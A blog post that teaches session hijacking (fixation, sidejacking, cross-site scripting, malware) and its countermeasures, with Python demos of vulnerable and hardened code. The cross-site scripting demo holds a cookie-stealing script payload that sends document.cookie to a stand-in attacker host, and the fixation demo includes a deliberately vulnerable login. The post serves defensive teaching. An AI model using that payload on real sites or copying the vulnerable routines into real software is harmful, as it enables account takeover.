Wednesday, January 6, 2016

What is Session Hijacking?


When a user authenticates to a web server, the server keeps track of the logged-in session with a session identifier, normally stored in an HTTP cookie on the user's computer and sent back with every request. Session Hijacking is an attack in which an attacker takes over a valid session of a user, by learning or controlling that identifier, and gets unauthorized access to the web application for malicious purposes without ever knowing the password.

There are a couple of methods by which Session Hijacking is performed:


Session Fixation: In this attack, the attacker sets the user's session id to one known to him in advance. When the user falls into the trap and logs in to the server, the session the attacker already knows becomes authenticated, and the attacker impersonates him.

It normally follows these steps:

  • The attacker obtains a session id from the server, then uses social engineering and sends the victim a link carrying that predefined session id.
  • The victim clicks on the link and a login screen appears. When he logs on, the server keeps that same session id and marks it as authenticated (because the web application does not issue a new session id at login).
  • But this session id is known to the attacker. So the attacker now presents it to the server and is treated as the logged-in victim.
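The following is an added example written for this post, not code from any real application or framework: a minimal in-memory session store with two login routines. The vulnerable one keeps whatever session id the browser already carries (the id the attacker planted), so the attacker's id becomes an authenticated session. The hardened one discards the pre-login id and issues a fresh random one. The store, the function names and the scenario are all constructed for illustration.

```python
import secrets

# Constructed in-memory session store for the demo: sid -> {"user": ...}
# (example code for this post, not from any real framework)
SESSIONS = {}


def new_session():
    """Create an anonymous (pre-login) session and return its id.
    This is the step the attacker performs to obtain an id to plant."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": None}
    return sid


def login_vulnerable(sid, username):
    """Fixation-prone login: the session id the browser already carries
    (possibly planted by the attacker) is kept and simply marked
    authenticated. Some servers even create the session on the spot when
    the id is unknown, which makes planting trivial."""
    session = SESSIONS.setdefault(sid, {"user": None})
    session["user"] = username
    return sid


def login_safe(sid, username):
    """Hardened login: invalidate the pre-login session id on the server and
    issue a fresh, random one, so an id known to the attacker never becomes
    an authenticated session."""
    SESSIONS.pop(sid, None)
    fresh_sid = secrets.token_urlsafe(32)
    SESSIONS[fresh_sid] = {"user": username}
    return fresh_sid


def whoami(sid):
    """What the server believes about the holder of this session id."""
    session = SESSIONS.get(sid)
    return session["user"] if session else None


def demo():
    """Run the attack against both logins. Returns a pair:
    (user the attacker gets with the vulnerable login,
     user the attacker gets with the hardened login)."""
    # 1. Attacker obtains an id and plants it on the victim, e.g. with a
    #    link like https://example.com/login?sid=<id> (hypothetical site).
    planted_sid = new_session()
    # 2. Victim logs in while carrying the planted id.
    login_vulnerable(planted_sid, "alice")
    # 3. Attacker presents the id he already knows.
    hijacked_user = whoami(planted_sid)

    # Same scenario against the login that regenerates the id.
    planted_sid2 = new_session()
    login_safe(planted_sid2, "alice")
    attacker_sees = whoami(planted_sid2)

    return hijacked_user, attacker_sees


if __name__ == "__main__":
    print(demo())
```

With the vulnerable login the planted id resolves to "alice"; with the hardened login the planted id is gone from the store and the attacker gets nothing, while the victim carries on with a new id she alone has received.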


Session Sidejacking: In this attack, the attacker sniffs the network traffic between the victim's machine and the server and reads the session cookie out of it. It works because the cookie is sent in the clear on every request over an unencrypted HTTP connection.

It normally follows these steps:

  • The victim logs in to the server and starts communicating with it.
  • The attacker uses a packet sniffer on the same network path and reads the traffic between them.
  • The attacker picks the session cookie out of the captured HTTP requests.
  • The attacker replays the same session cookie to the server and impersonates the victim, without ever needing the password.


Cross-Site Scripting: In this attack, the attacker injects client-side script into web pages viewed by the victim. The script runs in the victim's browser with the same access to the page, and to its cookies, as the site's own code, and can steal sensitive information such as the session cookie.

It normally follows these steps:

  • The attacker finds a page that reflects user input without escaping it and crafts a link carrying a script which, when it runs in a logged-in user's browser, sends the session information to the attacker.
  • The attacker uses some social engineering and sends the link to the victim.
  • The victim, already logged in to the server, clicks on the link.
  • The session information held in the cookie is transferred to the attacker.
  • The attacker now uses the stolen session information to impersonate the victim at the server.
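Here is an added example, not code from the original post: a reflecting "welcome" page shown in its vulnerable form and its escaped form, together with the kind of link an attacker would send. The payload, the hostnames bank.example and attacker.example and the parameter name "name" are all constructed for illustration. The escaping is done with Python's standard html.escape, which is the fix a server-side developer would apply to this bug.

```python
import html
from urllib.parse import urlparse, parse_qs, quote

# Constructed payload of the kind the steps above describe: when it runs in
# the victim's browser it ships document.cookie to an attacker-controlled host
# (attacker.example is a hypothetical name).
PAYLOAD = ("<script>new Image().src="
           "'http://attacker.example/steal?c='+document.cookie</script>")

# Constructed link the attacker would send to the victim; bank.example is a
# hypothetical site whose welcome page reflects the "name" parameter.
ATTACK_LINK = "https://bank.example/welcome?name=" + quote(PAYLOAD)


def name_from_link(url):
    """Extract the 'name' query parameter, as the reflecting page would."""
    params = parse_qs(urlparse(url).query)
    return params.get("name", [""])[0]


def render_vulnerable(display_name):
    """The bug: user-controlled input is pasted straight into the HTML,
    so a <script> element in it is executed by the victim's browser."""
    return "<h1>Welcome, " + display_name + "</h1>"


def render_safe(display_name):
    """The fix: HTML-escape the input so the browser renders it as text.
    The payload still appears on the page, but as harmless characters."""
    return "<h1>Welcome, " + html.escape(display_name, quote=True) + "</h1>"


def executes_script(page):
    """Crude stand-in for the browser: is there a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    name = name_from_link(ATTACK_LINK)
    print("vulnerable page runs script:", executes_script(render_vulnerable(name)))
    print("escaped page runs script:   ", executes_script(render_safe(name)))
```

Escaping removes the injection, but it only helps where the developer remembered to apply it; the cookie attributes discussed under the countermeasures below limit the damage when some page is missed.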


Using Malware: Here, the attacker infects the victim's computer with malware that steals the session cookie directly from the machine, so no network sniffing or web application flaw is needed.

Just to give an example:

  • The victim installs software from an untrusted source.
  • The victim's computer is infected with a browser hijacker.
  • The malware changes the security settings of the victim's browser.
  • When the victim logs in to the server, the malware reads the session cookie and transfers it to the attacker.
  • The attacker can now present that cookie to the server and impersonate the victim.

Countermeasures for Session Hijacking

We can take a couple of steps to prevent Session Hijacking.

  • Web applications should use SSL/TLS for the whole session, not just the login page, and mark the session cookie Secure so the browser never sends it over plain HTTP. This encrypts the traffic and makes it very hard for a sniffer to read the session cookie or any other information.
  • Web applications should use long session ids generated from a cryptographically secure random number generator, so that guessing or brute-forcing a valid id is infeasible. Ids derived from the time or a counter are predictable and do not count.
  • After a user authenticates, the server should discard the pre-login session id and issue a new one. This defeats session fixation, because the id the attacker planted never becomes an authenticated session.
  • Web applications can use secondary checks like comparing the client's IP address with the one seen at login. Use these with care: users behind NAT or on mobile networks change IP addresses legitimately, so a strict check logs them out, while an attacker on the victim's own network may share the same address.
  • Web applications can rotate the session cookie with each request made by the user's computer. This shortens the window in which a stolen cookie is usable, though it can break when the browser sends several requests at once.
  • Users should always log out of web applications as soon as they are done, and the application should invalidate the session on the server at logout, rather than just clearing the browser cookie, so that a copy of the cookie already stolen stops working.
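The block below is an added example for this post, not code from any real application: it puts several of the countermeasures above into working form. It shows a predictable (time-based) session id next to one drawn from the OS random source, a Set-Cookie header with the Secure and HttpOnly attributes, and a server-side session table that rejects unknown, idle or logged-out ids, so that a stolen cookie dies when the victim logs out. The cookie name "session", the timeouts and the function names are assumptions made for the example; the regeneration-on-login step is covered in the session fixation example above and not repeated here.

```python
import secrets

IDLE_TIMEOUT = 900   # seconds of inactivity before a session is dropped
COOKIE_MAX_AGE = 1800

# Constructed server-side session table for the demo: sid -> session record
SESSIONS = {}


def weak_session_id(now):
    """What NOT to do: an id derived from the clock. Anyone who knows roughly
    when the victim logged in can enumerate candidates, and two logins in the
    same second even collide. Shown only for contrast."""
    return str(int(now * 1000))


def make_session_id(nbytes=32):
    """256 bits from the OS CSPRNG, URL-safe so it can travel in a cookie."""
    return secrets.token_urlsafe(nbytes)


def set_cookie_header(sid, max_age=COOKIE_MAX_AGE):
    """Value for the Set-Cookie response header.
    Secure   -> the browser never sends it over plain HTTP (sidejacking)
    HttpOnly -> document.cookie cannot read it (XSS cookie theft)"""
    return f"session={sid}; Path=/; Max-Age={max_age}; Secure; HttpOnly"


def create_session(user, now):
    """Start an authenticated session and return its id."""
    sid = make_session_id()
    SESSIONS[sid] = {"user": user, "last_seen": now}
    return sid


def lookup(sid, now):
    """Check performed on every request. Returns the user for a live session,
    or None when the id is unknown, was logged out, or has been idle too long.
    Expired entries are removed so they cannot be revived later."""
    record = SESSIONS.get(sid)
    if record is None:
        return None
    if now - record["last_seen"] > IDLE_TIMEOUT:
        del SESSIONS[sid]
        return None
    record["last_seen"] = now
    return record["user"]


def logout(sid):
    """Invalidate on the server, not merely by clearing the browser cookie.
    Returns True if a live session was actually removed."""
    return SESSIONS.pop(sid, None) is not None


if __name__ == "__main__":
    t = 1_000_000.0
    print("weak id, two logins same instant:", weak_session_id(t), weak_session_id(t))
    sid = create_session("alice", now=t)
    print("Set-Cookie:", set_cookie_header(sid))
    print("request 1:", lookup(sid, now=t + 60))
    logout(sid)
    print("replay of stolen cookie after logout:", lookup(sid, now=t + 120))
```

Because validity lives in the server table, the victim logging out (or the idle window passing) revokes every copy of the cookie, including the one the attacker captured; a cookie that is only cleared client-side would remain valid for as long as the server keeps the session.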

So, this was another piece of information on a common threat. Hope it helped you.
